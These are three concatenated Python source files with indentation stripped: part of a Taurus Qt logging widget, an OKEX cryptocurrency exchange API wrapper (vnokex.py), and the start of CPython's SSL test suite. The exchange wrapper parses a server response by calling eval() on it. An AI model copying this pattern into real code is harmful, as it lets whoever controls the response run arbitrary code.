self.beginInsertRows(Qt.QModelIndex(), position, position + rows - 1)
self.endInsertRows()
def removeRows(self, position, rows=1, index=Qt.QModelIndex()):
self.beginRemoveRows(Qt.QModelIndex(), position, position + rows - 1)
self.endRemoveRows()
# def setData(self, index, value, role=Qt.Qt.DisplayRole):
# pass
# def flags(self, index)
# pass
# def insertColumns(self):
# pass
# def removeColumns(self):
# pass
# --------------------------
# logging.Handler overwrite
# --------------------------
def timerEvent(self, evt):
self.updatePendingRecords()
def updatePendingRecords(self):
if not self._accumulated_records:
return
row_nb = self.rowCount()
records = self._accumulated_records
self._accumulated_records = []
self._records.extend(records)
self.insertRows(row_nb, len(records))
if len(self._records) > self._capacity:
start = len(self._records) - self._capacity
self._records = self._records[start:]
self.removeRows(0, start)
def emit(self, record):
self._accumulated_records.append(record)
def flush(self):
pass
def close(self):
self.flush()
del self._records[:]
logging.Handler.close(self)
class _LogRecordStreamHandler(LogRecordStreamHandler):
def handleLogRecord(self, record):
self.server.data.get('model').emit(record)
class QRemoteLoggingTableModel(QLoggingTableModel):
"""A remote Qt table that displays the taurus logging messages"""
def connect_logging(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=_LogRecordStreamHandler):
self.log_receiver = LogRecordSocketReceiver(host=host, port=port,
handler=handler, model=self)
self.log_thread = threading.Thread(
target=self.log_receiver.serve_until_stopped)
self.log_thread.daemon = False
self.log_thread.start()
def disconnect_logging(self):
if not hasattr(self, 'log_receiver') or self.log_receiver is None:
return
self.log_receiver.stop()
self.log_thread.join()
del self.log_receiver
class QLoggingTable(Qt.QTableView):
"""A Qt table that displays the taurus logging messages"""
scrollLock = False
def rowsInserted(self, index, start, end):
"""Overwrite of slot rows inserted to do proper resize and scroll to
bottom if desired"""
Qt.QTableView.rowsInserted(self, index, start, end)
for i in range(start, end + 1):
self.resizeRowToContents(i)
if start == 0:
self.resizeColumnsToContents()
if not self.scrollLock:
self.scrollToBottom()
def setScrollLock(self, scrollLock):
"""Sets the state for scrollLock"""
self.scrollLock = scrollLock
def getScrollLock(self):
"""Returns wheater or not the scrollLock is active"""
return self.scrollLock
def resetScrollLock(self):
self.setScrollLock(QLoggingTable.ScrollLock)
class LoggingToolBar(FilterToolBar):
scrollLockToggled = Qt.pyqtSignal(bool)
def __init__(self, view=None, parent=None, designMode=False):
FilterToolBar.__init__(self, view=view, parent=parent,
designMode=designMode)
self.getFilterLineEdit().setToolTip("Quick filter by log name")
self._logLevelComboBox = logLevelComboBox = Qt.QComboBox()
levels = "Trace", "Debug", "Info", "Warning", "Error", "Critical"
for level in levels:
logLevelComboBox.addItem(level, getattr(taurus, level))
logLevelComboBox.setCurrentIndex(0)
logLevelComboBox.currentIndexChanged.connect(self.onLogLevelChanged)
logLevelComboBox.setToolTip("Filter by log level")
self._filterLevelAction = self.addWidget(logLevelComboBox)
self.addSeparator()
af = ActionFactory()
self._scrollLockAction = af.createAction(self, "Refresh",
icon=Qt.QIcon.fromTheme(
"system-lock-screen"),
tip="Scroll lock",
toggled=self.onToggleScrollLock)
self.addAction(self._scrollLockAction)
def onToggleScrollLock(self, yesno):
self.scrollLockToggled.emit(yesno)
def onLogLevelChanged(self, index):
self.onFilterChanged()
def getLogLevelComboBox(self):
return self._logLevelComboBox
def getLogLevel(self):
combo = self.getLogLevelComboBox()
return combo.itemData(combo.currentIndex())
def setLogLevel(self, level):
combo = self.getLogLevelComboBox()
for i in range(combo.count()):
l = combo.itemData(i)
if l == level:
combo.setCurrentIndex(i)
class QLoggingFilterProxyModel(Qt.QSortFilterProxyModel):
"""A filter by log record object name"""
def __init__(self, parent=None):
Qt.QSortFilterProxyModel.__init__(self, parent)
self._logLevel = taurus.Trace
# filter configuration
self.setFilterCaseSensitivity(Qt.Qt.CaseInsensitive)
self.setFilterKeyColumn(0)
self.setFilterRole(Qt.Qt.DisplayRole)
# sort configuration
# self.setSortCaseSensitivity(Qt.Qt.CaseInsensitive)
# self.setSortRole(Qt.Qt.DisplayRole)
# general configuration
def setFilterLogLevel(self, level):
self._logLevel = level
def __getattr__(self, name):
return getattr(self.sourceModel(), name)
def filterAcceptsRow(self, sourceRow, sourceParent):
sourceModel = self.sourceModel()
idx = sourceModel.index(sourceRow, NAME, sourceParent)
record = self.getRecord(idx)
if record.levelno < self._logLevel:
return False
name = str(sourceModel.data(idx))
regexp = self.filterRegExp()
if regexp.indexIn(name) != -1:
return True
return False
_W = "Warning: Switching log perspective will erase previous log messages " \
"from current perspective!"
class QLoggingWidget(QBaseTableWidget):
KnownPerspectives = {
'Standard': {
"label": "Local",
"icon": "computer",
"tooltip": "Local logging.\n" + _W,
"model": [QLoggingFilterProxyModel, QLoggingTableModel, ],
},
'Remote': {
"label": "Remote",
"icon": "network-server",
"tooltip": "Monitor remote logs.\n" + _W,
"model": [QLoggingFilterProxyModel, QRemoteLoggingTableModel, ],
},
}
DftPerspective = 'Standard'
def __init__(self, parent=None, designMode=False,
with_filter_widget=LoggingToolBar,
with_selection_widget=True, with_refresh_widget=True,
perspective=None, proxy=None):
QBaseTableWidget.__init__(self, parent=parent, designMode=designMode,
with_filter_widget=with_filter_widget,
with_selection_widget=False, with_refresh_widget=False,
perspective=perspective, proxy=proxy)
def createViewWidget(self, klass=None):
if klass is None:
klass = QLoggingTable
view = QBaseTableWidget.createViewWidget(self, klass=klass)
hh = view.horizontalHeader()
if hh.length() > 0:
try:
hh.setSectionResizeMode(MSG, Qt.QHeaderView.Stretch)
except AttributeError: # PyQt4
hh.setResizeMode(MSG, Qt.QHeaderView.Stretch)
view.setShowGrid(False)
view.sortByColumn(TIME, Qt.Qt.AscendingOrder)
return view
def createToolArea(self):
tb = QBaseTableWidget.createToolArea(self)
filterBar = self.getFilterBar()
filterBar.scrollLockToggled.connect(self.onScrollLockToggled)
return tb
def onScrollLockToggled(self, yesno):
self.viewWidget().setScrollLock(yesno)
def onFilterChanged(self, filter):
if not self.usesProxyQModel():
return
proxy_model = self.getQModel()
level = self.getFilterBar().getLogLevel()
proxy_model.setFilterLogLevel(level)
return QBaseTableWidget.onFilterChanged(self, filter)
def onSwitchPerspective(self, perspective):
self.stop_logging()
if perspective == "Remote":
if hasattr(self, 'hostName') and hasattr(self, 'port'):
host, port = self.hostName, self.port
else:
isValid = False
dft = "%s:%d" % (socket.gethostname(),
logging.handlers.DEFAULT_TCP_LOGGING_PORT)
while not isValid:
txt, res = Qt.QInputDialog.getText(self,
"Please input remote logging host and port",
"Location (<host>:<port>):", Qt.QLineEdit.Normal, dft)
if not res:
return
try:
host, port = str(txt).split(":", 1)
port = int(port)
isValid = True
except:
Qt.QMessageBox.information(self, "Invalid name",
"Please type a valid <host>:<port>")
ret = QBaseTableWidget.onSwitchPerspective(self, perspective)
qmodel = self.getQModel()
qmodel.connect_logging(host=host, port=port)
else:
ret = QBaseTableWidget.onSwitchPerspective(self, perspective)
return ret
def destroy(self, destroyWindow=True, destroySubWindows=True):
self.stop_logging()
return QBaseTableWidget.destroy(self, destroyWindow, destroySubWindows)
def stop_logging(self):
model = self.getBaseQModel()
if hasattr(model, 'disconnect_logging'):
model.disconnect_logging()
@classmethod
def getQtDesignerPluginInfo(cls):
return {
'module': 'taurus.qt.qtgui.table',
'group': 'Taurus Views',
'icon': 'designer:table.png',
'container': False}
def fill_log():
import time
import random
for i in range(10):
taurus.info("Hello world %04d" % i)
loggers = ["Object%02d" % (i + 1) for i in range(10)]
i = 0
while True:
time.sleep(random.random())
logger = logging.getLogger(random.choice(loggers))
level = random.randint(taurus.Trace, taurus.Critical)
logger.log(level, "log message %04d" % i)
i += 1
def main():
import taurus.qt.qtgui.application
Application = taurus.qt.qtgui.application.TaurusApplication
app = Application.instance()
owns_app = app is None
if owns_app:
app = Application(app_name="Logging demo", app_version="1.0",
org_domain="Taurus", org_name="Taurus community")
taurus.setLogLevel(taurus.Trace)
taurus.disableLogOutput()
w = QLoggingWidget()
taurus.trace("trace message")
taurus.debug("debug message")
taurus.info("Hello world")
taurus.warning("Warning message")
taurus.error("error message")
taurus.critical("critical message")
w.setMinimumSize(1200, 600)
w.show()
app.exec_()
w.stop_logging()
@click.command('qlogmon')
@click.option(
'--port', 'port', type=int,
default=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
show_default=True,
help='Port where log server is running',
)
@click.option(
'--log-name', 'log_name',
default=None,
help='Filter specific log object',
)
@taurus.cli.common.log_level
def qlogmon_cmd(port, log_name, log_level):
"""Show the Taurus Remote Log Monitor"""
import taurus
host = socket.gethostname()
level = getattr(taurus, log_level.capitalize(), taurus.Trace)
from taurus.qt.qtgui.application import TaurusApplication
app = TaurusApplication(cmd_line_parser=None,
app_name="Taurus remote logger")
w = QLoggingWidget(perspective="Remote")
w.setMinimumSize(1024, 600)
filterbar = w.getFilterBar()
filterbar.setLogLevel(level)
if log_name is not None:
filterbar.setFilterText(log_name)
w.getPerspectiveBar().setEnabled(False)
w.getQModel().connect_logging(host, port)
w.show()
app.exec_()
w.getQModel().disconnect_logging()
if __name__ == '__main__':
main()
# qlogmon_cmd
|
vnokex.py
|
# encoding: UTF-8
import hashlib
import zlib
import json
from time import sleep
from threading import Thread
import websocket
from HttpMD5Util import buildMySign, httpGet, httpPost
# OKEX网站
OKEX_USD_SPOT = 'wss://real.okex.com:10441/websocket' # OKEX 现货地址
#OKEX_USD_SPOT = 'wss://47.90.109.236:10441/websocket' # OKEX 现货地址
#OKEX_USD_SPOT = 'wss://ws.blockchain.info/inv' # OKEX 现货地址
OKEX_USD_CONTRACT = 'wss://real.okex.com:10440/websocket/okexapi' # OKEX 期货地址
OKEX_usd_CONTRACT_REST = "www.okex.com"
SPOT_CURRENCY = ["usdt",
"btc",
"ltc",
"eth",
"etc",
"bch"]
SPOT_SYMBOL = ["ltc_btc",
"eth_btc",
"etc_btc",
"bch_btc",
"btc_usdt",
"eth_usdt",
"ltc_usdt",
"etc_usdt",
"bch_usdt",
"etc_eth",
"bt1_btc",
"bt2_btc",
"btg_btc",
"qtum_btc",
"hsr_btc",
"neo_btc",
"gas_btc",
"qtum_usdt",
"hsr_usdt",
"neo_usdt",
"gas_usdt"]
KLINE_PERIOD = ["1min",
"3min",
"5min",
"15min",
"30min",
"1hour",
"2hour",
"4hour",
"6hour",
"12hour",
"day",
"3day",
"week"]
CONTRACT_SYMBOL = ["btc",
"ltc",
"eth",
"etc",
"bch"]
CONTRACT_TYPE = ["this_week",
"next_week",
"quarter"]
########################################################################
class OkexApi(object):
"""交易接口"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.host = '' # 服务器
self.apiKey = '' # 用户名
self.secretKey = '' # 密码
self.ws = None # websocket应用对象 现货对象
self.thread = None # 初始化线程
#----------------------------------------------------------------------
def reconnect(self):
"""重新连接"""
# 首先关闭之前的连接
self.close()
# 再执行重连任务
self.ws = websocket.WebSocketApp(self.host,
on_message=self.onMessage,
on_error=self.onError,
on_close=self.onClose,
on_open=self.onOpen)
self.thread = Thread(target=self.ws.run_forever,args=(None, None,25, None,None,None,None,None,False,None,None))
self.thread.start()
#----------------------------------------------------------------------
def connect(self, apiKey, secretKey, trace=False):
self.host = OKEX_USD_SPOT
self.apiKey = apiKey
self.secretKey = secretKey
websocket.enableTrace(trace)
self.ws = websocket.WebSocketApp(self.host,
on_message=self.onMessage,
on_error=self.onError,
on_close=self.onClose,
on_open=self.onOpen)
self.thread = Thread(target=self.ws.run_forever,args=(None, None,25, None,None,None,None,None,False,None,None))
self.thread.start()
#----------------------------------------------------------------------
def readData(self, evt):
"""解码推送收到的数据"""
data = json.loads(evt)
return data
#----------------------------------------------------------------------
def close(self):
"""关闭接口"""
if self.thread and self.thread.isAlive():
self.ws.close()
self.thread.join()
#----------------------------------------------------------------------
def onMessage(self, ws, evt):
"""信息推送"""
print evt
#----------------------------------------------------------------------
def onError(self, ws, evt):
"""错误推送"""
print 'onError'
print evt
#----------------------------------------------------------------------
def onClose(self, ws):
"""接口断开"""
print 'onClose'
#----------------------------------------------------------------------
def onOpen(self, ws):
"""接口打开"""
print 'onOpen'
#----------------------------------------------------------------------
def generateSign(self, params):
"""生成签名"""
l = []
for key in sorted(params.keys()):
l.append('%s=%s' %(key, params[key]))
l.append('secret_key=%s' %self.secretKey)
sign = '&'.join(l)
return hashlib.md5(sign.encode('utf-8')).hexdigest().upper()
#----------------------------------------------------------------------
def sendTradingRequest(self, channel, params):
"""发送交易请求"""
# 在参数字典中加上api_key和签名字段
try:
params['api_key'] = self.apiKey
params['sign'] = self.generateSign(params)
# 生成请求
d = {}
d['event'] = 'addChannel'
d['channel'] = channel
d['parameters'] = params
# 使用json打包并发送
j = json.dumps(d)
print d
except Exception, e:
# raise
print e
# 若触发异常则重连
try:
self.ws.send(j)
except websocket.WebSocketConnectionClosedException:
pass
#----------------------------------------------------------------------
def sendDataRequest(self, channel):
"""发送数据请求"""
d = {}
d['event'] = 'addChannel'
d['channel'] = channel
j = json.dumps(d)
print j
# 若触发异常则重连
try:
self.ws.send(j)
except websocket.WebSocketConnectionClosedException:
pass
#----------------------------------------------------------------------
def login(self):
params = {}
params['api_key'] = self.apiKey
params['sign'] = self.generateSign(params)
# 生成请求
d = {}
d['event'] = 'login'
d['parameters'] = params
# 使用json打包并发送
j = json.dumps(d)
# 若触发异常则重连
try:
self.ws.send(j)
return True
except websocket.WebSocketConnectionClosedException:
return False
########################################################################
class OkexSpotApi(OkexApi):
"""现货交易接口"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(OkexSpotApi, self).__init__()
#----------------------------------------------------------------------
def subscribeSpotTicker(self, symbol):
"""订阅现货的Tick"""
channel = 'ok_sub_spot_%s_ticker' %symbol
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeSpotDepth(self, symbol, depth=0):
"""订阅现货的深度"""
channel = 'ok_sub_spot_%s_depth' %symbol
if depth:
channel = channel + '_' + str(depth)
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeSpotDeals(self, symbol):
channel = 'ok_sub_spot_%s_deals' %symbol
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeSpotKlines(self, symbol, period):
channel = 'ok_sub_spot_%s_kline_%s' %(symbol, period)
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def spotTrade(self, symbol, type_, price, amount):
"""现货委托"""
params = {}
params['symbol'] = str(symbol)
params['type'] = str(type_)
params['price'] = str(price)
params['amount'] = str(amount)
channel = 'ok_spot_order'
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def spotCancelOrder(self, symbol, orderid):
"""现货撤单"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
channel = 'ok_spot_cancel_order'
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def spotUserInfo(self):
"""查询现货账户"""
channel = 'ok_spot_userinfo'
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def spotOrderInfo(self, symbol, orderid):
"""查询现货委托信息"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
channel = 'ok_spot_orderinfo'
self.sendTradingRequest(channel, params)
########################################################################
class OkexFuturesApi(OkexApi):
"""期货交易接口
交割推送信息:
[{
"channel": "btc_forecast_price",
"timestamp":"1490341322021",
"data": "998.8"
}]
data(string): 预估交割价格
timestamp(string): 时间戳
无需订阅,交割前一小时自动返回
"""
#----------------------------------------------------------------------
def __init__(self, apikey, secretkey):
"""Constructor"""
super(OkexFuturesApi, self).__init__()
self.__url = OKEX_usd_CONTRACT_REST
self.__apikey = apikey
self.__secretkey = secretkey
#----------------------------------------------------------------------
def subsribeFuturesTicker(self, symbol, contractType):
"""订阅期货行情"""
channel ='ok_sub_futureusd_%s_ticker_%s' %(symbol, contractType)
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeFuturesKline(self, symbol, contractType, period):
"""订阅期货K线"""
channel = 'ok_sub_futureusd_%s_kline_%s_%s' %(symbol, contractType, period)
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeFuturesDepth(self, symbol, contractType, depth=0):
"""订阅期货深度"""
channel = 'ok_sub_futureusd_%s_depth_%s' %(symbol, contractType)
if depth:
channel = channel + '_' + str(depth)
self.sendDataRequest(channel)
##----------------------------------------------------------------------
#def subscribeFuturesTrades(self, symbol, contractType):
# """订阅期货成交"""
# channel = 'ok_sub_futureusd_%s_trade_%s' %(symbol, contractType)
# self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeFuturesIndex(self, symbol):
"""订阅期货指数"""
channel = 'ok_sub_futureusd_%s_index' %symbol
self.sendDataRequest(channel)
'''
#----------------------------------------------------------------------
def futuresTrade(self, symbol, contractType, type_, price, amount, matchPrice='0', leverRate='10'):
"""期货委托"""
params = {}
params['symbol'] = str(symbol)
params['contract_type'] = str(contractType)
params['price'] = str(price)
params['amount'] = str(amount)
params['type'] = type_ # 1:开多 2:开空 3:平多 4:平空
params['match_price'] = matchPrice # 是否为对手价: 0:不是 1:是 当取值为1时,price无效
params['lever_rate'] = leverRate
channel = 'ok_futureusd_trade'
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def futuresCancelOrder(self, symbol, orderid, contractType):
"""期货撤单"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
params['contract_type'] = str(contractType)
channel = 'ok_futureusd_cancel_order'
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def futuresUserInfo(self):
"""查询期货账户"""
channel = 'ok_futureusd_userinfo'
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def futuresOrderInfo(self, symbol, orderid, contractType, status, current_page, page_length=10):
"""查询期货委托"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
params['contract_type'] = str(contractType)
params['status'] = str(status)
params['current_page'] = str(current_page)
params['page_length'] = str(page_length)
channel = 'ok_futureusd_orderinfo'
self.sendTradingRequest(channel, params)
'''
''' #----------------------------------------------------------------------
def subscribeFuturesTrades( self):
channel = 'ok_sub_futureusd_trades'
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def subscribeFuturesUserInfo(self):
"""订阅期货账户信息"""
channel = 'ok_sub_futureusd_userinfo'
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def subscribeFuturesPositions(self):
"""订阅期货持仓信息"""
channel = 'ok_sub_futureusd_positions'
self.sendTradingRequest(channel, {})
'''
# 用于访问OKCOIN 期货REST API
'''
# OKCOIN期货行情信息
def future_ticker(self, symbol, contractType):
FUTURE_TICKER_RESOURCE = "/api/v1/future_ticker.do"
params = ''
if symbol:
params += '&symbol=' + symbol if params else 'symbol=' + symbol
if contractType:
params += '&contract_type=' + contractType if params else 'contract_type=' + symbol
return httpGet(self.__url, FUTURE_TICKER_RESOURCE, params)
# OKCoin期货市场深度信息
def future_depth(self, symbol, contractType, size):
FUTURE_DEPTH_RESOURCE = "/api/v1/future_depth.do"
params = ''
if symbol:
params += '&symbol=' + symbol if params else 'symbol=' + symbol
if contractType:
params += '&contract_type=' + contractType if params else 'contract_type=' + symbol
if size:
params += '&size=' + size if params else 'size=' + size
return httpGet(self.__url, FUTURE_DEPTH_RESOURCE, params)
# OKCoin期货交易记录信息
def future_trades(self, symbol, contractType):
FUTURE_TRADES_RESOURCE = "/api/v1/future_trades.do"
params = ''
if symbol:
params += '&symbol=' + symbol if params else 'symbol=' + symbol
if contractType:
params += '&contract_type=' + contractType if params else 'contract_type=' + symbol
return httpGet(self.__url, FUTURE_TRADES_RESOURCE, params)
# OKCoin期货指数
def future_index(self, symbol):
FUTURE_INDEX = "/api/v1/future_index.do"
params = ''
if symbol:
params = 'symbol=' + symbol
return httpGet(self.__url, FUTURE_INDEX, params)
'''
# 获取美元人民币汇率
def exchange_rate(self):
EXCHANGE_RATE = "/api/v1/exchange_rate.do"
return httpGet(self.__url, EXCHANGE_RATE, '')
# 获取预估交割价
def future_estimated_price(self, symbol):
FUTURE_ESTIMATED_PRICE = "/api/v1/future_estimated_price.do"
params = ''
if symbol:
params = 'symbol=' + symbol
return httpGet(self.__url, FUTURE_ESTIMATED_PRICE, params)
# 期货全仓账户信息
def future_userinfo(self):
FUTURE_USERINFO = "/api/v1/future_userinfo.do?"
params = {}
params['api_key'] = self.__apikey
params['sign'] = buildMySign(params, self.__secretkey)
return httpPost(self.__url, FUTURE_USERINFO, params)
# 期货全仓持仓信息
def future_position(self, symbol, contractType):
try:
FUTURE_POSITION = "/api/v1/future_position.do?"
params = {
'api_key': self.__apikey,
'symbol': symbol,
'contract_type': contractType
}
params['sign'] = buildMySign(params, self.__secretkey)
result = httpPost(self.__url, FUTURE_POSITION, params)
result = result.encode().replace('true', '1')
result = result.replace('false', '0')
return eval(result)
except Exception,e:
print e
# 期货下单
def future_trade(self, symbol, contractType, price='', amount='', tradeType='', matchPrice='', leverRate=''):
FUTURE_TRADE = "/api/v1/future_trade.do?"
params = {
'api_key': self.__apikey,
'symbol': symbol,
'contract_type': contractType,
'amount': amount,
'type': tradeType,
'match_price': matchPrice,
'lever_rate': leverRate
}
if price:
params['price'] = price
params['sign'] = buildMySign(params, self.__secretkey)
return httpPost(self.__url, FUTURE_TRADE, params)
# 期货批量下单
def future_batchTrade(self, symbol, contractType, orders_data, leverRate):
FUTURE_BATCH_TRADE = "/api/v1/future_batch_trade.do?"
params = {
'api_key': self.__apikey,
'symbol': symbol,
'contract_type': contractType,
'orders_data': orders_data,
'lever_rate': leverRate
}
params['sign'] = buildMySign(params, self.__secretkey)
return httpPost(self.__url, FUTURE_BATCH_TRADE, params)
# 期货取消订单
def future_cancel(self, symbol, contractType, orderId):
FUTURE_CANCEL = "/api/v1/future_cancel.do?"
params = {
'api_key': self.__apikey,
'symbol': symbol,
'contract_type': contractType,
'order_id': orderId
}
params['sign'] = buildMySign(params, self.__secretkey)
return httpPost(self.__url, FUTURE_CANCEL, params)
# 期货获取订单信息
def future_orderinfo(self, symbol, contractType, orderId, status, currentPage, pageLength):
FUTURE_ORDERINFO = "/api/v1/future_order_info.do?"
params = {
'api_key': self.__apikey,
'symbol': symbol,
'contract_type': contractType,
'order_id': orderId,
'status': status,
'current_page': currentPage,
'page_length': pageLength
}
params['sign'] = buildMySign(params, self.__secretkey)
return httpPost(self.__url, FUTURE_ORDERINFO, params)
# 期货逐仓账户信息
def future_userinfo_4fix(self):
FUTURE_INFO_4FIX = "/api/v1/future_userinfo_4fix.do?"
params = {'api_key': self.__apikey}
params['sign'] = buildMySign(params, self.__secretkey)
return httpPost(self.__url, FUTURE_INFO_4FIX, params)
# 期货逐仓持仓信息
def future_position_4fix(self, symbol, contractType, type1):
FUTURE_POSITION_4FIX = "/api/v1/future_position_4fix.do?"
params = {
'api_key': self.__apikey,
'symbol': symbol,
'contract_type': contractType,
'type': type1
}
params['sign'] = buildMySign(params, self.__secretkey)
return httpPost(self.__url, FUTURE_POSITION_4FIX, params)
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Jul 7 14:23:16 2028 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
